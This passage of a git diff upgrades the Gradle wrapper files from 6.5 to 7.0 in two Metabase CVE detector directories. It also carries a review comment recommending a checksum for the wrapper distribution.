b/community/detectors/metabase_cve_2021_41277/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/metabase_cve_2021_41277/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/metabase_cve_2021_41277/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/metabase_cve_2021_41277/gradlew b/community/detectors/metabase_cve_2021_41277/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/metabase_cve_2021_41277/gradlew +++ b/community/detectors/metabase_cve_2021_41277/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/metabase_cve_2021_41277/gradlew.bat b/community/detectors/metabase_cve_2021_41277/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/metabase_cve_2021_41277/gradlew.bat +++ b/community/detectors/metabase_cve_2021_41277/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/metabase_cve_2023_38646/gradle/wrapper/gradle-wrapper.jar b/community/detectors/metabase_cve_2023_38646/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/metabase_cve_2023_38646/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/metabase_cve_2023_38646/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/metabase_cve_2023_38646/gradle/wrapper/gradle-wrapper.properties b/community/detectors/metabase_cve_2023_38646/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/metabase_cve_2023_38646/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/metabase_cve_2023_38646/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/metabase_cve_2023_38646/gradlew b/community/detectors/metabase_cve_2023_38646/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/metabase_cve_2023_38646/gradlew +++ b/community/detectors/metabase_cve_2023_38646/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
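Review bot: The new `distributionUrl` line in this gradle-wrapper.properties hunk points at `gradle-7.0-bin.zip` but no `distributionSha256Sum` is set, so the wrapper does not integrity-check the distribution it downloads; as far as I can tell, the added `validateDistributionUrl=true` only checks the URL, not the archive contents. I would add `distributionSha256Sum=SHA256_OF_GRADLE_7_0_BIN_ZIP` below the URL line (placeholder; take the value from Gradle's published release checksums). The same applies to the gradle-wrapper.properties hunks for minio_cve_2023_28432, mlflow_cve_2023_6014 and mlflow_cve_2023_6977. Because gradle-wrapper.jar is replaced as an opaque binary in the same commit, it would also be worth checking the jar against Gradle's published wrapper checksums in CI.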
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/metabase_cve_2023_38646/gradlew.bat b/community/detectors/metabase_cve_2023_38646/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/metabase_cve_2023_38646/gradlew.bat +++ b/community/detectors/metabase_cve_2023_38646/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
